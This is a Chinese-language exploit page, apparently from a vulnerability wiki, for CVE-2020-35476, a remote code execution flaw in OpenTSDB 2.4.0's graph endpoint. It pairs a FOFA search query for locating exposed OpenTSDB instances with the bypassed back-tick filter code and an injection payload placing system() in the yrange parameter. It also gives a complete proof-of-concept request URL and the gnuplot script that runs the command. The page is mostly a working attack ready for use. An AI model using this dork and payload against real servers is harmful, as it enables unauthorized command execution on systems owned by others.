跳转至

CVE-2020-35476 OpenTSDB 2.4.0 远程代码执行

在OpenTSDB 2.4.0及更低版本中yrange参数发现了一个远程执行代码漏洞(其他参数可能也容易受到攻击)。

fofa:title="Opentsdb" ||body="opentsdb_header.jpg"

在 CVE-2018-12972 用 反引号 来进行命令注入,o=%60ls%60 官方引入如下函数来过滤,现在可以重新被绕过。

// TODO - far from perfect, should help a little.
        if *(given.contains("`") || given.contains("%60") || 
            given.contains("`")) *{
          throw new BadRequestException("Parameter " + param + " contained a "
              + "back-tick. That's a no-no.");
        }

/src/tsd/GraphHandler.java:

private static String popParam(final Map<String, List<String>> querystring,
                                         final String param) {
        final List<String> params = querystring.remove(param);
        if (params == null) {
          return null;
        }
        final String given = params.get(params.size() - 1);
        // TODO - far from perfect, should help a little.
        if *(given.contains("`") || given.contains("%60") || 
            given.contains("&#96;")) *{
          throw new BadRequestException("Parameter " + param + " contained a "
              + "back-tick. That's a no-no.");
        }
        return given;
      }

Bypass Payload:

[33:system('touch/tmp/poc.txt')]

PoC:

http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json

OpenTSDB在temp目录中创建的gnuplot文件如下所示:

set term png small size 1516,644
set xdata time
set timefmt "%s"
if (GPVAL_VERSION < 4.6) set xtics rotate; else set xtics rotate right
set output "/tmp/d705ba5b.png"
set xrange ["972086400":"1603641404"]
set format x "%Y/%m/%d"
set grid
set style data linespoint
set key right box
set ylabel ""
*set yrange [33:system('touch /tmp/poc.txt')]*
plot "/tmp/d705ba5b_0.dat" using 1:2 title "sys.cpu.nice{host=web01, dc=lga}"

当OpenTSDB执行mygnuplot.sh的时候poc.txt文件将被写入到临时目录。

ref:

  • https://github.com/OpenTSDB/opentsdb/issues/2051
  • https://xz.aliyun.com/t/2511
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35476
  • https://forum.ywhack.com/thread-114835-1-2.html